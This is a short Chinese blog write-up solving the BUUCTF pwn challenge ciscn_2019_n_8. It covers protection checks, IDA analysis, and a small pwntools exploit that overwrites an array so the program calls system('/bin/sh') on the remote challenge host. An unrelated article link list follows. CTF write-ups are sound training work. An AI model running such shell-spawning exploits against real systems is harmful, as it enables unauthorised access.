[BUUCTF]PWN13——ciscn_2019_n_8
2024-09-05 02:43:52
[BUUCTF]PWN13——ciscn_2019_n_8
题目网址:https://buuoj.cn/challenges#ciscn_2019_n_8
步骤:
例行检查,32位,保护开的挺多,canary(栈保护),nx(堆栈不可执行),PIE(地址随机化)
nc一下,看看程序大概的执行情况
32位ida载入,shift+f12查看程序里的字符串,看到了system和bin/sh
双击跟进,ctrl+x查看哪里调用了这个字符串
很简单的一个程序,一开始让我们输入name,之后只要var[13]=17就会调用system(‘/bin/sh’)获取shell
我们只要将var这个数组里全部填上17即可通过判断
EXP
from pwn import*
r=remote('node3.buuoj.cn',26348)
payload=p32(17)*14
r.sendline(payload)
r.interactive()
一道简单的逻辑绕过,感觉跟保护机制没太大关系
最新文章
- alias指令:设置命令别名
- sql rank()函数
- GBDT算法原理深入解析
- Sturts2的action不执行任何方法的原因
- oracle rac重建控制文件
- 修改phpmyadmin文件的最大上传大小
- 初涉A*剪枝
- js 高级函数 之示例
- C#中log4net使用方法(一)
- 2014-CVTE网测部分软件技术测试题及答案
- 我是如何同时拿到阿里和腾讯offer的
- 基于I2C EPPRPM(AT24C02B) + LCD12864实验
- hdu 5391 (数论)
- Python调用ansible API系列(三)带有callback的执行adhoc和playbook
- Linux 编程笔记(三)
- JDK动态代理源码解析
- Windows bat 学习(初级)
- PostgreSQL获取table名,字段名
- 敏捷转型中why与how的总结
- canvas.drawBitmap(bitmap, src, dst, paint)